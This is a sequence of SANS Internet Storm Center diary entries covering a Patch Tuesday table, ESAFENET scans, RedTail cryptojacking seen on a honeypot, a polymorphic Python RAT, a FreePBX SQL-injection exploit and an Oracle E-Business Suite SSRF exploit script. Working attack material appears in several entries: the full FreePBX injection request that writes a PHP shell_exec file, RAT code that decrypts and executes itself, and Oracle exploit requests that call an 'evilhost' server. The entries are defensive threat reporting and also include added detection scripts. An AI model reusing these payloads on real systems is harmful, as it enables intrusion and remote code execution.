Windows Storage Management Provider Information Disclosure Vulnerability
%%cve:2025-55325%% No No - - Important 5.5 4.8
Windows Taskbar Live Preview Information Disclosure Vulnerability
%%cve:2025-59294%% No No - - Important 2.1 1.9
Windows URL Parsing Remote Code Execution Vulnerability
%%cve:2025-59295%% No No - - Important 8.8 7.7
Windows USB Video Class System Driver Information Disclosure Vulnerability
%%cve:2025-55676%% No No - - Important 5.5 4.8
Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability
%%cve:2025-53717%% No No - - Important 7.0 6.1
Windows WLAN AutoConfig Service Information Disclosure Vulnerability
%%cve:2025-55695%% No No - - Important 5.5 4.8
Xbox Gaming Services Elevation of Privilege Vulnerability
%%cve:2025-59281%% No No - - Important 7.8 6.8
Xbox IStorageService Elevation of Privilege Vulnerability
%%cve:2025-53768%% No No - - Important 7.8 6.8

--
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Heads Up: Scans for ESAFENET CDG V5, (Mon, Oct 13th)

In January, a possible XSS vulnerability was found in the electronic document security management system ESAFENET CDG. This was the latest (as far as I can tell) in a long list of vulnerabilities in the product. Prior vulnerabilities included SQL injection issues and weaknesses in the encryption used to safeguard documents. In other words: A typical "secure" document management system. The product appears to be targeting the Chinese market, and with a website all in Chinese, I doubt it is used much, if at all, outside China.

The scans we are seeing are directed at "/CDGServer3/SystemConfig". The one vulnerability I was able to find was CVE-2025-0785, which mentions a possible XSS vulnerability in SystemConfig.jsp. Sadly, not all of our sensors report POST data (working on fixing that), so I am not sure if this is the issue they are trying to exploit. The GitHub repo with details about the vulnerability is no longer available, and the NVD entries are not really complete and do not link to any pages within the manufacturer's website with possible patches.

A quick scan of the manufacturer's website did not reveal any obvious patches or references to this bug.

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-0785
[2] https://www.esafenet.com

--
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


[Guest Diary] Building Better Defenses: RedTail Observations from a Honeypot, (Thu, Oct 9th)

[This is a Guest Diary by Jin Quan Low, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

Ransomware [2] is often the first word that comes to mind when we think about cybercriminals chasing financial gain. It barges in, locks files, drops ransom notes, and causes immediate disruption.

Cryptojacking [3], on the other hand, acts like a quiet trespasser. It slips in unnoticed, makes itself at home, and hijacks computing resources in the background to mine cryptocurrency while the victim stays unaware. Because it rarely causes disruptions, cryptojacking does not get the same level of attention as ransomware. 

Over the past three months, my DShield honeypot captured repeated attempts to deploy RedTail, a cryptojacking malware first observed in early 2024 [4]. RedTail targets Monero cryptocurrency [5], typically gaining access through brute-forced SSH logins or exploiting vulnerabilities and deploying scripts to establish persistence and launch mining processes. The activity observed showed that compromises can extend beyond simple cryptomining, making RedTail a relevant case study for defenders.

Mapping Attacks to MITRE ATT&CK Tactics, Techniques and Procedures (TTPs)

Malware IOCs are very useful for quick detection, but they can be easily invalidated. Attackers only need to change part of their code, and those indicators lose all value. RedTail malware is no exception. Researchers had already detected different hashes of the same malware [6]. 

TTPs, on the other hand, rarely change and can be leveraged to detect similar threat behaviours. Hence, the observed attack involving RedTail malware is mapped to the MITRE ATT&CK framework below, followed by how we can better defend ourselves.

The ATT&CK framework can be categorized into PRE-ATT&CK and ATT&CK (refer to Figure 1).


Figure 1: PRE-ATT&CK & ATT&CK (MITRE ATT&CK framework)

 

The following attack sequence observed from my honeypot is mapped to this framework as an example.

PRE-ATT&CK

The early phases — reconnaissance and weaponization — may not always appear in logs, but later activity on the honeypot shows the existence of those phases (refer to Figure 2).

  • Reconnaissance: Attackers scan IP ranges to look for exposed services (T1595.001: Active Scanning – Scanning IP Block).
  • Weaponization: They develop or package their malware payloads (T1587.001: Develop Capabilities – Malware) and stage them for delivery (T1608.001: Stage Capabilities – Upload Malware).


Figure 2: PRE-ATT&CK phase showing reconnaissance and weaponization techniques observed

 

ATT&CK

The ATT&CK phase entails the Deliver, Exploit, Control, Execute and Maintain stages.

The Deliver phase (refer to Figure 3) is mapped to the following stages:

  • Initial Access: In my honeypot, attackers attempted brute-force SSH logins and eventually succeeded using valid credentials (T1078.002: Valid Accounts – Local Account).
  • Execution: Once inside, attackers ran clean.sh and setup.sh to prepare the environment (T1059.004: Command and Scripting Interpreter – Unix Shell).
  • Persistence: Attackers implanted their own SSH keys to maintain access (T1098.004: Account Manipulation – SSH Authorized Keys). This allowed them to return at will, bypassing password controls.


Figure 3: Deliver phase highlighting brute-forced SSH access, script execution, and persistence methods

 

The Exploit to Execute phase (refer to Figure 4) is mapped to the following stages:

  • Defense Evasion: Attackers deleted files to cover their tracks (T1070.004: Indicator Removal – File Deletion). 
  • Discovery: Attackers queried system information to confirm compatibility before deploying RedTail (T1082: System Information Discovery).


Figure 4: Exploit and Execute phase showing file deletion and system discovery activity

 

The Execute and Maintain phase (refer to Figure 5) is mapped to the following stages:

  • Command and Control: Outbound HTTPS traffic (Port 443) from infected systems to malicious mining pool servers [6]. This matches ATT&CK’s T1071.001: Application Layer Protocol – Web Protocols.
  • Impact: RedTail malware is known to hijack CPU cycles to mine cryptocurrency (T1496.001: Resource Hijacking – Compute Hijacking). While subtle, this creates financial and performance costs for victims.


Figure 5: Execute and Maintain stage including outbound pool traffic and cryptojacking impact

 

Unique Observations from Honeypot

While RedTail has been reported in multiple incidents, my honeypot logs revealed several noteworthy behaviors beyond generic cryptojacking activity:

  • Brute-forced SSH access: Attackers brute-forced SSH logins before deploying RedTail, showing that weak credentials remain an active entry vector.
  • Script-based setup: After gaining access, they uploaded and executed setup.sh to configure the miner. They also ran clean.sh to remove competing cryptomining processes, ensuring RedTail had exclusive use of system resources.
  • Persistence through SSH keys: Attackers implanted their own SSH keys into ~/.ssh/authorized_keys, allowing them to return without repeating brute-force attempts.
  • Defense evasion: Logs recorded file deletion commands, which indicated that attackers tried to cover their tracks after installation.

These observations show that RedTail campaigns extend beyond simple cryptomining. Attackers maintain persistence, remove competition, and conceal their activity — behaviors that defenders should use when building detection and response strategies.

Mitigation

Defending against RedTail and similar cryptojacking malware requires a two-stage approach: prevention and detection/response.

  1. Prevention (First Line of Defense)
    • Hardening Access
      • Use SSH key authentication and disable password logins.
      • Rate-limit SSH login attempts; enforce lockouts on repeated failures (fail2ban).
      • Disable root logins (PermitRootLogin no) and unnecessary services.
    • Patching and Updates
      • Apply security updates.
    • Network Controls
      • Restrict unnecessary inbound access.
      • Segment honeypots and exposed systems from production assets.
      • Block or sinkhole known mining pool connections.
         
  2. Detection & Response (Catching What Slips Through)
    • Visibility
      • Enable detailed SSH, process, and outbound network logging.
      • Monitor CPU, memory, and disk I/O for abnormal sustained spikes.
    • TTP-Based Detection
      • Watch for brute-force attempts and repeated failed logins.
      • Flag unauthorized entries in ~/.ssh/authorized_keys.
      • Detect creation of unusual systemd services.
      • Monitor encrypted outbound traffic to unknown/private pools.
    • Response Actions
      • Isolate compromised hosts immediately.
      • Remove attacker SSH keys and terminate mining processes.
      • Rebuild compromised systems from clean images.
    • Continuous Monitoring
      • Track for reinfection attempts.
      • Use honeypots (like DShield) to capture new TTPs and feed them into defenses.
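As an added example (not part of the diary or of DShield), here is a small Python detector for the TTP that opened this incident: a successful SSH login following a burst of failed attempts from the same source. The sshd log lines are constructed, and the threshold of five failures in ten minutes is an assumption to tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed OpenSSH syslog lines (not taken from the honeypot described in the diary).
# 203.0.113.5 fails five times then succeeds; 198.51.100.7 is a normal user with one typo.
SAMPLE_LOG = """\
Oct 10 12:00:01 sensor sshd[4411]: Failed password for root from 203.0.113.5 port 51234 ssh2
Oct 10 12:00:03 sensor sshd[4412]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2
Oct 10 12:00:05 sensor sshd[4413]: Failed password for root from 203.0.113.5 port 51238 ssh2
Oct 10 12:00:07 sensor sshd[4414]: Failed password for root from 203.0.113.5 port 51240 ssh2
Oct 10 12:00:09 sensor sshd[4415]: Failed password for root from 203.0.113.5 port 51242 ssh2
Oct 10 12:00:11 sensor sshd[4416]: Accepted password for root from 203.0.113.5 port 51244 ssh2
Oct 10 12:30:00 sensor sshd[4500]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Oct 10 12:30:20 sensor sshd[4501]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_line(line):
    """Return (timestamp, result, method, user, ip) for an sshd auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the constructed sample stays within one month
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return ts, m.group("result"), m.group("method"), m.group("user"), m.group("ip")

def detect_bruteforce_success(lines, threshold=5, window=timedelta(minutes=10)):
    """Alert when a source IP logs in successfully after at least `threshold` failures
    inside `window`: the brute-force-then-deploy pattern seen before RedTail was dropped.
    Threshold and window are assumptions; tune them to the environment."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failed attempts
    alerts = []
    for raw in lines:
        parsed = parse_line(raw)
        if parsed is None:
            continue
        ts, result, method, user, ip = parsed
        recent = failures[ip]
        while recent and ts - recent[0] > window:
            recent.popleft()  # drop failures that fell out of the window
        if result == "Failed":
            recent.append(ts)
        elif len(recent) >= threshold:
            alerts.append({"ip": ip, "user": user, "method": method, "failures": len(recent)})
            recent.clear()
    return alerts

if __name__ == "__main__":
    for a in detect_bruteforce_success(SAMPLE_LOG.splitlines()):
        print(f"[!] {a['ip']} logged in as {a['user']} via {a['method']} "
              f"after {a['failures']} failed attempts")
```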

Conclusion

The only way to detect threats is to look for them, and detection has little value without response. Protecting devices and networks remains challenging but achievable with layered defenses. As the world grows more connected and attackers get craftier, defenders must improve too.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://www.checkpoint.com/cyber-hub/threat-prevention/ransomware/
[3] https://www.malwarebytes.com/cryptojacking
[4] https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit
[5] https://www.forescout.com/blog/new-redtail-malware-exploited-via-php-security-vulnerability/
[6] https://isc.sans.edu/diary/30950
[7] https://www.virustotal.com/gui/file/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8/behavior

 

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Polymorphic Python Malware, (Wed, Oct 8th)

Today, I spotted on VirusTotal an interesting Python RAT. There are tons of them, but this one attracted my attention because of some function names present in the code: self_modifying_wrapper(), decrypt_and_execute() and polymorph_code(). Polymorphic malware is malware developed to repeatedly mutate its appearance or signature at every execution. The file got a very low score of 2/64 on VT! (SHA256:7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c).

To be able to modify its code on the fly, the program must have access to its own source code. Many languages have this capability. I covered the same technique in JavaScript a long time ago[1]. With Python, there is a very interesting module that adds the same capability: inspect[2].

Here is a simple snippet of code to demonstrate how it works:

remnux@remnux:~$ cat poc.py
import inspect

def dummy_function():
    print("I'm a dummy function!")

def main():
    print("Function code:")
    print(inspect.getsource(dummy_function))

if __name__ == "__main__":
    main()

remnux@remnux:~$ python3 poc.py
Function code:
def dummy_function():
    print("I'm a dummy function!")

Once you get the source code, you can perform plenty of actions with it, such as anti-tampering detection (checking whether the code was modified, for example to debug it) or obfuscation.

In the discovered sample, the self_modifying_wrapper() function grabs the source code of a function, XORs it with a random key, un-XORs it and executes it from memory:

# Self-modifying code wrapper (simulates packing)
def self_modifying_wrapper():
    """Wrap critical code in a self-modifying layer."""
    log_path = resource_path('debug.log')
    try:
        # Simulate packed code by XORing critical sections
        critical_code = inspect.getsource(main).encode()
        xor_key = random.randint(1, 255)
        packed_code = bytes(b ^ xor_key for b in critical_code)
        # Unpack at runtime
        unpacked_code = bytes(b ^ xor_key for b in packed_code)
        code_obj = marshal.loads(zlib.decompress(unpacked_code))
        exec(code_obj)
        with open(log_path, "a") as f:
            f.write("[+] Self-modifying code executed\n")
        return True
    except Exception as e:
        with open(log_path, "a") as f:
            f.write(f"[-] Self-modifying code failed: {e}\n")
        return False

The malware also has the capability to inject junk code:

def polymorph_code(code):
    """Obfuscate code with advanced randomization and junk code."""
    log_path = resource_path('debug.log')
    try:
        # Advanced variable renaming
        var_map = {var: ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 12))) for var in code.split() if var.isidentifier()}
        for old_var, new_var in var_map.items():
            code = code.replace(old_var, new_var)
        # Insert complex junk code
        junk_snippets = [
            "def _unused_{}(): return None\n".format(''.join(random.choice(string.ascii_letters) for _ in range(8))),
            "x = [0] * {}; x = [y for y in x]\n".format(random.randint(10, 100)),
            "import time; time.sleep({})\n".format(random.uniform(0.01, 0.1)),
            "try: pass\nexcept: pass\n"
        ]
        lines = code.split('\n')
        for _ in range(random.randint(10, 20)):
            lines.insert(random.randint(0, len(lines)), random.choice(junk_snippets))
        code = '\n'.join(lines)
        # Shuffle function order
        code = code.replace('\r\n', '\n')  # Normalize line endings
        functions = re.findall(r'(def .+?\n\s*return .+?\n)', code, re.DOTALL)
        if functions:
            random.shuffle(functions)
            code = code.replace(''.join(functions), ''.join(functions))
        with open(log_path, "a") as f:
            f.write("[+] Advanced polymorphic transformation applied\n")
        return code
    except Exception as e:
        with open(log_path, "a") as f:
            f.write(f"[-] Polymorphic transformation failed: {e}\n")
        return code
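To turn the observation above into something reusable, here is an added example (my code, not the sample's) that uses Python's ast module to flag the indicators seen in self_modifying_wrapper() and polymorph_code(): a function reading its own source with inspect.getsource(), marshal/zlib unpacking, exec() of the result, and the function names that drew attention in the first place. The scanned snippet is a constructed stand-in, not the actual sample.

```python
import ast

# Indicators drawn from the behaviour described above: reading a function's own source
# with inspect, marshal/zlib unpacking, runtime shuffling, and exec() of the result.
SUSPICIOUS_CALLS = {
    ("inspect", "getsource"): "reads its own source code",
    ("marshal", "loads"): "deserialises a code object",
    ("zlib", "decompress"): "decompresses an embedded blob",
    ("random", "shuffle"): "randomises code order at runtime",
}
SUSPICIOUS_BUILTINS = {"exec": "executes dynamically built code",
                       "compile": "compiles code at runtime"}
# The three names that made the sample stand out on VirusTotal.
NAME_HINTS = ("polymorph", "self_modifying", "decrypt_and_execute")

def _call_name(node):
    """Return ('module', 'attr') for module.attr(...) or (None, 'name') for bare calls."""
    f = node.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return (f.value.id, f.attr)
    if isinstance(f, ast.Name):
        return (None, f.id)
    return None

def triage_python_source(source):
    """Return sorted (lineno, finding) tuples for self-modifying/polymorphic indicators.
    Parsing with ast means string-obfuscated names are not seen: a triage aid, not a verdict."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            if any(h in node.name.lower() for h in NAME_HINTS):
                findings.append((node.lineno, f"suspicious function name: {node.name}"))
        elif isinstance(node, ast.Call):
            key = _call_name(node)
            if key in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"{key[0]}.{key[1]}: {SUSPICIOUS_CALLS[key]}"))
            elif key and key[0] is None and key[1] in SUSPICIOUS_BUILTINS:
                findings.append((node.lineno, f"{key[1]}(): {SUSPICIOUS_BUILTINS[key[1]]}"))
    return sorted(findings)

# Constructed input modelled on the pattern in the sample (not the actual malware).
SAMPLE = '''
import inspect, marshal, zlib, random

def self_modifying_wrapper():
    src = inspect.getsource(main).encode()
    key = random.randint(1, 255)
    packed = bytes(b ^ key for b in src)
    code_obj = marshal.loads(zlib.decompress(bytes(b ^ key for b in packed)))
    exec(code_obj)

def main():
    print("hello")
'''

if __name__ == "__main__":
    for lineno, finding in triage_python_source(SAMPLE):
        print(f"line {lineno}: {finding}")
```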
        
Besides this specificity, the malware is a classic one and offers plenty of features to the attacker. Here is a list of interesting functions that gives a good overview of its capabilities:

remnux@remnux:~$ grep "async def" 7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c
async def socket_network_scan():
async def scan_host(ip):
async def try_router_hack(ip):
async def test_default_credentials(ip, service, port):
async def deliver_payload(ip, share=None, service=None, port=None):
async def execute_payload(ip, target_path, service):
async def get_phone_number(stolen_data):
async def send_stolen_data(stolen_data, channel, logins_path):
async def spread_to_network():
async def report_spreading_status(ip, message):
async def xworm(ctx, spread_url="https://example.com/serial_spoofer.exe"):
async def record_screen_webcam(voice_channel, ctx):
async def on_ready():
async def commands(ctx):
async def encrypt(ctx):
async def mine(ctx):
async def screenshot(ctx):
async def audio(ctx):
async def listen(ctx):
async def execute(ctx, *, command):
async def upload(ctx):
async def download(ctx, *, filename):
async def xworm(ctx):
async def archive(ctx):
async def system_info(ctx):
async def run(ctx, *, program):

In the same way, here is the list of bot commands:

# Bot command: Show available commands
@bot.command()
async def commands(ctx):
    log_path = resource_path('debug.log')
    with open(log_path, "a") as f:
        f.write("[+] Sending command list\n")
    commands_list = """
    /commands - Show this help message
    /encrypt - Encrypt victim's files
    /mine - Start cryptominer (simulated)
    /screenshot - Capture screenshot
    /audio - Capture audio
    /listen - Record screen for 30 seconds, stream high-quality live audio to voice channel
    /execute <command> - Run shell command
    /upload - Upload attached file to victim's PC
    /download <filename> - Search and send file from victim's PC
    /xworm - Deploy Xworm payload
    /archive - Archive critical files
    /keylog_start - Start keylogger
    /keylog_stop - Stop keylogger and send log
    /system_info - Get system information
    /run <program> - Run a program
    """
    await ctx.send(commands_list)

The file was uploaded on VT as "nirorat.py". I did not find any reference to this RAT. If you have more details, let us know!

[1] https://isc.sans.edu/diary/AntiDebugging+JavaScript+Techniques/26228
[2] https://docs.python.org/3/library/inspect.html
 

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploit Against FreePBX (CVE-2025-57819) with code execution, (Tue, Oct 7th)

FreePBX is a popular PBX system built around the open source VoIP system Asterisk. To manage Asterisk more easily, it provides a capable web-based admin interface. Sadly, like so many web applications, it has had its share of vulnerabilities in the past. Most recently, a SQL injection vulnerability was found that allows attackers to modify the database.

For a PBX, there are a number of obvious attacks. For example, they are often abused for free phone calls, to impersonate the companies running the PBX, or to hide the true origin of phone calls. Manipulating the FreePBX database would certainly facilitate these types of attacks. However, I noticed some slightly more interesting attacks recently attempting to achieve complete code execution.

A typical request looks like:

GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x' ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

The "brand" parameter is used for the SQL injection, and the parameter decodes to:

 ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

FreePBX uses the cron_jobs database table to manage its cron jobs. Inserting a row into the table results in simple, arbitrary code execution. The injected command creates the file /var/www/html/rspgf.php with the following content:

<?php header('x_poc: CVE-2025-57819'); echo shell_exec('uname -a'); unlink(__FILE__); ?>

So this is a simple test to see whether the system is vulnerable. Interestingly, the file deletes itself after being accessed by the attacker. The cron job should persist and re-create the file every minute, which makes the unlink() kind of pointless. I do not see any hits in our honeypot for this file. Reviewing the cron_jobs table should be another good way to find similar exploits.
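The suggestion to review the cron_jobs table is easy to script. The following is an added example (not FreePBX code) that flags rows with the shape of the injected one and checks a raw access-log request line for the stacked INSERT. The rows, the hypothetical PHP class name and the request are constructed from the columns and command shown above, with the base64 blob replaced by a placeholder.

```python
import re
from urllib.parse import unquote_plus

# Column order used by the INSERT in the captured request.
COLUMNS = ("modulename", "jobname", "command", "class", "schedule",
           "max_runtime", "enabled", "execution_order")

# Heuristics (assumptions, not FreePBX logic) for a row planted through the injection.
WEBROOT_WRITE = re.compile(r">\s*/var/www/html/\S+\.php")
DECODE_PIPE = re.compile(r"\|\s*base64\s+-d\b")
STACKED_INSERT = re.compile(r"'\s*;\s*INSERT\s+INTO\s+cron_jobs\b", re.IGNORECASE)

def review_cron_job(row):
    """Return the reasons a cron_jobs row (dict keyed by COLUMNS) looks planted; [] = nothing found."""
    reasons = []
    cmd = row.get("command") or ""
    if WEBROOT_WRITE.search(cmd):
        reasons.append("command writes a .php file into the web root")
    if DECODE_PIPE.search(cmd):
        reasons.append("command decodes an embedded base64 blob")
    if row.get("class") is None and row.get("schedule") == "* * * * *":
        reasons.append("raw shell command (no PHP class) scheduled every minute")
    return reasons

def find_cron_jobs_injection(request_line):
    """Return the names of query parameters carrying a stacked INSERT into cron_jobs.
    Accepts a raw access-log request line, with or without method and HTTP version."""
    m = re.match(r"^[A-Z]+\s+(.*?)(?:\s+HTTP/\d\.\d)?$", request_line)
    target = m.group(1) if m else request_line
    query = target.partition("?")[2]
    hits = []
    for pair in query.split("&"):  # split by hand so ';' inside the payload is not a separator
        name, _, value = pair.partition("=")
        if STACKED_INSERT.search(unquote_plus(value)):
            hits.append(name)
    return hits

# Constructed samples modelled on the diary's request; the base64 blob is a placeholder.
PLANTED_ROW = dict(zip(COLUMNS, (
    "sysadmin", "takdak",
    'echo "<base64 payload omitted>"|base64 -d >/var/www/html/rspgf.php',
    None, "* * * * *", 30, 1, 1)))
LEGIT_ROW = dict(zip(COLUMNS, (
    "backup", "nightly", None, "\\FreePBX\\modules\\Backup\\Job",  # hypothetical class name
    "0 2 * * *", 600, 1, 1)))
ATTACK_REQUEST = (
    "GET /admin/ajax.php?module=FreePBX\\modules\\endpoint\\ajax&command=model&template=x&model=model"
    "&brand=x' ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,"
    "execution_order) VALUES ('sysadmin','takdak','echo \"<base64 payload omitted>\"|base64 -d "
    ">/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) -- HTTP/1.1")
NORMAL_REQUEST = "GET /admin/ajax.php?module=endpoint&command=model&brand=x HTTP/1.1"

if __name__ == "__main__":
    print(review_cron_job(PLANTED_ROW), review_cron_job(LEGIT_ROW))
    print(find_cron_jobs_injection(ATTACK_REQUEST), find_cron_jobs_injection(NORMAL_REQUEST))
```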

Please make sure your FreePBX instance is up to date. The vulnerability was initially made public on August 28th [1], and was already exploited at the time.

[1] https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203

 

--
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Quick and Dirty Analysis of Possible Oracle E-Business Suite Exploit Script (CVE-2025-61882) [UPDATED], (Mon, Oct 6th)

[Update: I added the server part delivering the payload]

This weekend, Oracle published a surprise security bulletin announcing an exploited vulnerability in Oracle E-Business Suite. As part of the announcement, which also included a patch, Oracle published IoCs observed during the incident response [1].

One script I found interesting is what Oracle calls "exp.py" [2]. Here is a quick analysis of the HTTP requests sent by the script. I only ran it against a simple Python web server, not an actual Oracle E-Business Suite install.

The script takes two parameters: The URL of the target and the IP/port of a config server.

The first request sent by the script:

GET /OA_HTML/runforms.jsp HTTP/HTTP/1.1
Host: [target host]:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The script starts by assuming that the internal host is the same as the target host. If this request results in a redirect, the new internal host will be extracted from the Location header.

POST /OA_HTML/JavaScriptServlet HTTP/HTTP/1.1
Host: [target host]:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Content-Length: 0

This request will return a CSRF token that is extracted from the body of the response.

Finally, the actual exploit request is created:

POST /OA_HTML/configurator/UiServlet HTTP/HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Content-Length: 4324
Content-Type: application/x-www-form-urlencoded

These are the headers of the request, which are not very remarkable. The body is a bit more interesting. After URL and HTML entity decoding, the body turns out to be:

redirectFromJsp=1
getUiType=<?xml+version="1.0"+encoding="UTF-8"?>
<initialize>
++++<param+name="init_was_saved">test</param>
++++<param+name="return_url">
http://target:7201/OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2
Host: evilhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie:

POST /

++++<param+name="ui_def_id">0</param>
++++<param+name="config_effective_usage_id">0</param>
++++<param+name="ui_type">Applet</param>
</initialize>

The use of the invalid HTTP version 1.2 is interesting; it may be intended to bypass some filters. The stray "POST /" at the end is labeled as "keep alive", and may just be a partial request to keep the connection open a bit longer.

Port 7201 is the default non-TLS port for the application server. The URL looks like a path traversal exploit. Given that this is the payload of the last request, the vulnerability is likely best described as a server-side request forgery issue (and it is labeled as such in the script). 

In short, the exploit does:

  • Verify the hostname
  • Retrieve a CSRF token
  • Send a request to the app server that uses SSRF to connect to an "evilhost" and, presumably, retrieve instructions. Maybe more about this later.

From a detection point of view, the HTTP version 1.2 looks promising.
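To make the detection idea concrete, here is an added example (not from exp.py or Oracle) that applies the same URL and HTML entity decoding to a UiServlet POST body and flags a return_url parameter that embeds a request line with an invalid HTTP version, line breaks, a smuggled Host header or a path traversal. The request body is constructed after the decoded payload above; "target" and "evilhost" are placeholders.

```python
import re
from html import unescape
from urllib.parse import unquote_plus

VALID_VERSIONS = {"1.0", "1.1", "2.0"}
REQUEST_LINE = re.compile(r"(?:https?://\S+|/\S*)\s+HTTP/(\d\.\d)")
HOST_HEADER = re.compile(r"^Host:\s*(\S+)", re.MULTILINE)
RETURN_URL = re.compile(r'<param\s+name="return_url">(.*?)</param>', re.DOTALL)

def decode_body(raw):
    """Apply the two decodings used in the analysis: URL decoding, then HTML entity decoding."""
    return unescape(unquote_plus(raw))

def inspect_ebs_body(raw):
    """Return findings for a UiServlet POST body whose return_url carries a smuggled request."""
    m = RETURN_URL.search(decode_body(raw))
    if not m:
        return []
    value = m.group(1)
    findings = []
    for version in REQUEST_LINE.findall(value):
        if version not in VALID_VERSIONS:
            findings.append(f"return_url embeds a request line with invalid HTTP version {version}")
    if "\n" in value:
        findings.append("return_url contains line breaks (smuggled headers)")
    for host in HOST_HEADER.findall(value):
        findings.append(f"return_url smuggles a Host header for {host}")
    if "/../" in value:
        findings.append("return_url contains a path traversal sequence")
    return findings

# Constructed body modelled on the decoded payload above; hosts are placeholders.
SAMPLE_BODY = (
    "redirectFromJsp=1&getUiType=%3C%3Fxml+version%3D%221.0%22%3F%3E%3Cinitialize%3E"
    "%3Cparam+name%3D%22init_was_saved%22%3Etest%3C%2Fparam%3E"
    "%3Cparam+name%3D%22return_url%22%3E"
    "http%3A%2F%2Ftarget%3A7201%2FOA_HTML%2Fhelp%2F..%2Fieshostedsurvey.jsp+HTTP%2F1.2%0D%0A"
    "Host%3A+evilhost%3A80%0D%0AConnection%3A+keep-alive%0D%0A%0D%0APOST+%2F%0D%0A"
    "%3C%2Fparam%3E%3Cparam+name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%3C%2Finitialize%3E"
)
# A benign-looking body with a plain return_url, for comparison.
BENIGN_BODY = (
    "redirectFromJsp=1&getUiType=%3Cinitialize%3E%3Cparam+name%3D%22return_url%22%3E"
    "http%3A%2F%2Ftarget%3A7201%2FOA_HTML%2FOA.jsp%3C%2Fparam%3E%3C%2Finitialize%3E"
)

if __name__ == "__main__":
    for finding in inspect_ebs_body(SAMPLE_BODY):
        print("[!]", finding)
```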

The "evilhost" the script connects to is implemented with a simple Python script, server.py, implementing two paths [3]:

GET /OA_HTML/help/../ieshostedsurvey.xsl
POST /OA_HTML/help/../ibeCRgpIndividualUser.jsp

Both return the same XSLT style sheet:

<xsl:stylesheet version="1.0"
                    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                    xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
                    xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
                    xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
                    xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
